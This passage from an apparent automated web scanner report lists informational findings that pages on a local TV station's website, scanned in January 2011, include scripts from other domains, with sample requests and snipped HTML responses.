<script type="text/javascript" src="http://common.onset.freedom.com/fi/analytics/cms/?scode=wrgb&ctype=search&cname=site+search+results+article+newest&shier=search%7Clocal&ghier=search%7Clocal&searcht=&searchr=&domain=www.cbs6albany.com&fd=&us=anonymous"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.786. http://www.cbs6albany.com/sections/abouthdtv/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cbs6albany.com
Path:   /sections/abouthdtv/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /sections/abouthdtv/ HTTP/1.1
Host: www.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; SC_LINKS=%5B%5BB%5D%5D; cf=1; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:20:51 GMT
Server: Apache
Cache-Control: max-age=600
Expires: Sat, 29 Jan 2011 04:30:51 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 23551

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>

...[SNIP]...
<div id="stats"><script language="javascript" src="http://common.onset.freedom.com/fi/analytics/cms/?scode=wrgb&amp;domain=www.cbs6albany.com&amp;ctype=section&amp;shier=custsvc&amp;ghier=custsvc&amp;us=anonymous"></script>
...[SNIP]...
<div class="fi_adsense">

<script type='text/javascript' src='http://common.onset.freedom.com/fi/adsense/?scode=wrgb&amp;placement=section'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</script><script src="http://an.tacoda.net/an/15135/slf.js" type="text/javascript"></script>
...[SNIP]...

18.787. http://www.cbs6albany.com/sections/articles-map/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cbs6albany.com
Path:   /sections/articles-map/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /sections/articles-map/ HTTP/1.1
Host: www.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; SC_LINKS=%5B%5BB%5D%5D; cf=1; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:21:50 GMT
Server: Apache
Cache-Control: max-age=600
Expires: Sat, 29 Jan 2011 04:31:50 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 22945

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" xmlns:og="
...[SNIP]...
<div id="stats"><script language="javascript" src="http://common.onset.freedom.com/fi/analytics/cms/?scode=wrgb&amp;domain=www.cbs6albany.com&amp;ctype=section&amp;shier=news&amp;ghier=news&amp;us=anonymous"></script>
...[SNIP]...
<div class="fi_adsense">
           
<script type='text/javascript' src='http://common.onset.freedom.com/fi/adsense/?scode=wrgb&amp;placement=section'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.788. http://www.cbs6albany.com/sections/contactus/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cbs6albany.com
Path:   /sections/contactus/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /sections/contactus/ HTTP/1.1
Host: www.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; SC_LINKS=%5B%5BB%5D%5D; cf=1; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:22:31 GMT
Server: Apache
Cache-Control: max-age=600
Expires: Sat, 29 Jan 2011 04:32:31 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 24650

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>

...[SNIP]...
<div id="stats"><script language="javascript" src="http://common.onset.freedom.com/fi/analytics/cms/?scode=wrgb&amp;domain=www.cbs6albany.com&amp;ctype=section&amp;shier=custsvc&amp;ghier=custsvc&amp;us=anonymous"></script>
...[SNIP]...
<div align="center" class="infocenter newstext">
<script type="text/javascript" src="http://b3.caspio.com/scripts/e1.js"></script>
...[SNIP]...
<div class="fi_adsense">

<script type='text/javascript' src='http://common.onset.freedom.com/fi/adsense/?scode=wrgb&amp;placement=section'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</script><script src="http://an.tacoda.net/an/15135/slf.js" type="text/javascript"></script>
...[SNIP]...

18.789. http://www.cbs6albany.com/sections/contactus/newstips/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cbs6albany.com
Path:   /sections/contactus/newstips/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /sections/contactus/newstips/ HTTP/1.1
Host: www.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; SC_LINKS=%5B%5BB%5D%5D; cf=1; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:23:02 GMT
Server: Apache
Cache-Control: max-age=600
Expires: Sat, 29 Jan 2011 04:33:02 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 44014


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
<div id="stats"><script language="javascript" src="http://common.onset.freedom.com/fi/analytics/cms/?scode=wrgb&amp;domain=www.cbs6albany.com&amp;ctype=section&amp;shier=custsvc&amp;ghier=custsvc&amp;us=anonymous"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://common.onset.freedom.com/js/zvents-mini-base.js"></script>
<script type="text/javascript" src="http://common.onset.freedom.com/js/zvents-mini-custom.js"></script>
...[SNIP]...
<div class="fi_adsense">
           
<script type='text/javascript' src='http://common.onset.freedom.com/fi/adsense/?scode=wrgb&amp;placement=section'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</script><script src="http://an.tacoda.net/an/15135/slf.js" type="text/javascript"></script>
...[SNIP]...

18.790. http://www.cbs6albany.com/sections/employmentopportunities/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cbs6albany.com
Path:   /sections/employmentopportunities/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /sections/employmentopportunities/ HTTP/1.1
Host: www.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; SC_LINKS=%5B%5BB%5D%5D; cf=1; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:26:50 GMT
Server: Apache
Cache-Control: max-age=600
Expires: Sat, 29 Jan 2011 04:36:50 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 23649

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>

...[SNIP]...
<div id="stats"><script language="javascript" src="http://common.onset.freedom.com/fi/analytics/cms/?scode=wrgb&amp;domain=www.cbs6albany.com&amp;ctype=section&amp;shier=classified%7Cjobs&amp;ghier=classified%7Cjobs&amp;us=anonymous"></script>
...[SNIP]...
<div class="fi_adsense">

<script type='text/javascript' src='http://common.onset.freedom.com/fi/adsense/?scode=wrgb&amp;placement=section'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</script><script src="http://an.tacoda.net/an/15135/slf.js" type="text/javascript"></script>
...[SNIP]...

18.791. http://www.cbs6albany.com/sections/jobsonline/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cbs6albany.com
Path:   /sections/jobsonline/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /sections/jobsonline/ HTTP/1.1
Host: www.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; SC_LINKS=%5B%5BB%5D%5D; cf=1; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:26:38 GMT
Server: Apache
Cache-Control: max-age=600
Expires: Sat, 29 Jan 2011 04:36:38 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 42961


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
<div id="stats"><script language="javascript" src="http://common.onset.freedom.com/fi/analytics/cms/?scode=wrgb&amp;domain=www.cbs6albany.com&amp;ctype=section&amp;shier=special&amp;ghier=special&amp;us=anonymous"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://common.onset.freedom.com/js/zvents-mini-base.js"></script>
<script type="text/javascript" src="http://common.onset.freedom.com/js/zvents-mini-custom.js"></script>
...[SNIP]...
<div class="fi_adsense">
           
<script type='text/javascript' src='http://common.onset.freedom.com/fi/adsense/?scode=wrgb&amp;placement=section'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</script><script src="http://an.tacoda.net/an/15135/slf.js" type="text/javascript"></script>
...[SNIP]...

18.792. http://www.cbs6albany.com/sections/live-cameras/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cbs6albany.com
Path:   /sections/live-cameras/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /sections/live-cameras/ HTTP/1.1
Host: www.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; SC_LINKS=%5B%5BB%5D%5D; cf=1; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:19:58 GMT
Server: Apache
Cache-Control: max-age=600
Expires: Sat, 29 Jan 2011 04:29:58 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 43116


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
<div id="stats"><script language="javascript" src="http://common.onset.freedom.com/fi/analytics/cms/?scode=wrgb&amp;domain=www.cbs6albany.com&amp;ctype=section&amp;shier=traffic&amp;ghier=traffic&amp;us=anonymous"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://common.onset.freedom.com/js/zvents-mini-base.js"></script>
<script type="text/javascript" src="http://common.onset.freedom.com/js/zvents-mini-custom.js"></script>
...[SNIP]...
<div class="fi_adsense">
           
<script type='text/javascript' src='http://common.onset.freedom.com/fi/adsense/?scode=wrgb&amp;placement=section'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</script><script src="http://an.tacoda.net/an/15135/slf.js" type="text/javascript"></script>
...[SNIP]...

18.793. http://www.cbs6albany.com/sections/local-news/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cbs6albany.com
Path:   /sections/local-news/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /sections/local-news/ HTTP/1.1
Host: www.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; SC_LINKS=%5B%5BB%5D%5D; cf=1; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:18:46 GMT
Server: Apache
Cache-Control: max-age=600
Expires: Sat, 29 Jan 2011 04:28:46 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 87750


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
<div id="stats"><script language="javascript" src="http://common.onset.freedom.com/fi/analytics/cms/?scode=wrgb&amp;domain=www.cbs6albany.com&amp;ctype=section&amp;shier=Local News&amp;ghier=news%7Clocal&amp;us=anonymous"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://common.onset.freedom.com/js/zvents-mini-base.js"></script>
<script type="text/javascript" src="http://common.onset.freedom.com/js/zvents-mini-custom.js"></script>
...[SNIP]...
<div class="fi_adsense">
           
<script type='text/javascript' src='http://common.onset.freedom.com/fi/adsense/?scode=wrgb&amp;placement=section'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</script><script src="http://an.tacoda.net/an/15135/slf.js" type="text/javascript"></script>
...[SNIP]...

18.794. http://www.cbs6albany.com/sections/local-sports/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cbs6albany.com
Path:   /sections/local-sports/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /sections/local-sports/ HTTP/1.1
Host: www.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; SC_LINKS=%5B%5BB%5D%5D; cf=1; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:19:04 GMT
Server: Apache
Cache-Control: max-age=600
Expires: Sat, 29 Jan 2011 04:29:04 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 74279


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
<div id="stats"><script language="javascript" src="http://common.onset.freedom.com/fi/analytics/cms/?scode=wrgb&amp;domain=www.cbs6albany.com&amp;ctype=section&amp;shier=Local Sports&amp;ghier=sports&amp;us=anonymous"></script>
...[SNIP]...
<div class="caspio">
<script type="text/javascript"
src="http://b3.caspio.com/scripts/e1.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://common.onset.freedom.com/js/zvents-mini-base.js"></script>
<script type="text/javascript" src="http://common.onset.freedom.com/js/zvents-mini-custom.js"></script>
...[SNIP]...
<div class="fi_adsense">
           
<script type='text/javascript' src='http://common.onset.freedom.com/fi/adsense/?scode=wrgb&amp;placement=section'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</script><script src="http://an.tacoda.net/an/15135/slf.js" type="text/javascript"></script>
...[SNIP]...

18.795. http://www.cbs6albany.com/sections/production-department/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cbs6albany.com
Path:   /sections/production-department/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /sections/production-department/ HTTP/1.1
Host: www.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; SC_LINKS=%5B%5BB%5D%5D; cf=1; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:24:46 GMT
Server: Apache
Cache-Control: max-age=600
Expires: Sat, 29 Jan 2011 04:34:46 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 42243


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
<div id="stats"><script language="javascript" src="http://common.onset.freedom.com/fi/analytics/cms/?scode=wrgb&amp;domain=www.cbs6albany.com&amp;ctype=section&amp;shier=custsvc%7Ccontact&amp;ghier=custsvc%7Ccontact&amp;us=anonymous"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://common.onset.freedom.com/js/zvents-mini-base.js"></script>
<script type="text/javascript" src="http://common.onset.freedom.com/js/zvents-mini-custom.js"></script>
...[SNIP]...
<div class="fi_adsense">
           
<script type='text/javascript' src='http://common.onset.freedom.com/fi/adsense/?scode=wrgb&amp;placement=section'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</script><script src="http://an.tacoda.net/an/15135/slf.js" type="text/javascript"></script>
...[SNIP]...

18.796. http://www.cbs6albany.com/sections/publicfile/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cbs6albany.com
Path:   /sections/publicfile/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /sections/publicfile/ HTTP/1.1
Host: www.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; SC_LINKS=%5B%5BB%5D%5D; cf=1; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:26:02 GMT
Server: Apache
Cache-Control: max-age=600
Expires: Sat, 29 Jan 2011 04:36:02 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 42512


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
<div id="stats"><script language="javascript" src="http://common.onset.freedom.com/fi/analytics/cms/?scode=wrgb&amp;domain=www.cbs6albany.com&amp;ctype=section&amp;shier=special&amp;ghier=special&amp;us=anonymous"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://common.onset.freedom.com/js/zvents-mini-base.js"></script>
<script type="text/javascript" src="http://common.onset.freedom.com/js/zvents-mini-custom.js"></script>
...[SNIP]...
<div class="fi_adsense">
           
<script type='text/javascript' src='http://common.onset.freedom.com/fi/adsense/?scode=wrgb&amp;placement=section'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</script><script src="http://an.tacoda.net/an/15135/slf.js" type="text/javascript"></script>
...[SNIP]...

18.797. http://www.cbs6albany.com/sections/rss/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cbs6albany.com
Path:   /sections/rss/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /sections/rss/ HTTP/1.1
Host: www.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; SC_LINKS=%5B%5BB%5D%5D; cf=1; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:18:30 GMT
Server: Apache
Cache-Control: max-age=600
Expires: Sat, 29 Jan 2011 04:28:30 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 59348


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
<div id="stats"><script language="javascript" src="http://common.onset.freedom.com/fi/analytics/cms/?scode=wrgb&amp;domain=www.cbs6albany.com&amp;ctype=section&amp;shier=media%7Crss&amp;ghier=media%7Crss&amp;us=anonymous"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://common.onset.freedom.com/js/zvents-mini-base.js"></script>
<script type="text/javascript" src="http://common.onset.freedom.com/js/zvents-mini-custom.js"></script>
...[SNIP]...
<div class="fi_adsense">
           
<script type='text/javascript' src='http://common.onset.freedom.com/fi/adsense/?scode=wrgb&amp;placement=section'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</script><script src="http://an.tacoda.net/an/15135/slf.js" type="text/javascript"></script>
...[SNIP]...

18.798. http://www.cbs6albany.com/sections/sales/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cbs6albany.com
Path:   /sections/sales/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /sections/sales/ HTTP/1.1
Host: www.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; SC_LINKS=%5B%5BB%5D%5D; cf=1; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:23:38 GMT
Server: Apache
Cache-Control: max-age=600
Expires: Sat, 29 Jan 2011 04:33:38 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 24699

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>

...[SNIP]...
<div id="stats"><script language="javascript" src="http://common.onset.freedom.com/fi/analytics/cms/?scode=wrgb&amp;domain=www.cbs6albany.com&amp;ctype=section&amp;shier=custsvc&amp;ghier=custsvc&amp;us=anonymous"></script>
...[SNIP]...
<div align="center" class="infocenter newstext">
<script type="text/javascript" src="http://b3.caspio.com/scripts/e1.js"></script>
...[SNIP]...
<div class="fi_adsense">

<script type='text/javascript' src='http://common.onset.freedom.com/fi/adsense/?scode=wrgb&amp;placement=section'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</script><script src="http://an.tacoda.net/an/15135/slf.js" type="text/javascript"></script>
...[SNIP]...

18.799. http://www.cbs6albany.com/sections/satellitewaivers/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cbs6albany.com
Path:   /sections/satellitewaivers/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /sections/satellitewaivers/ HTTP/1.1
Host: www.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; SC_LINKS=%5B%5BB%5D%5D; cf=1; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:25:09 GMT
Server: Apache
Cache-Control: max-age=600
Expires: Sat, 29 Jan 2011 04:35:09 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 42282


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
<div id="stats"><script language="javascript" src="http://common.onset.freedom.com/fi/analytics/cms/?scode=wrgb&amp;domain=www.cbs6albany.com&amp;ctype=section&amp;shier=custsvc&amp;ghier=custsvc&amp;us=anonymous"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://common.onset.freedom.com/js/zvents-mini-base.js"></script>
<script type="text/javascript" src="http://common.onset.freedom.com/js/zvents-mini-custom.js"></script>
...[SNIP]...
<div class="fi_adsense">
           
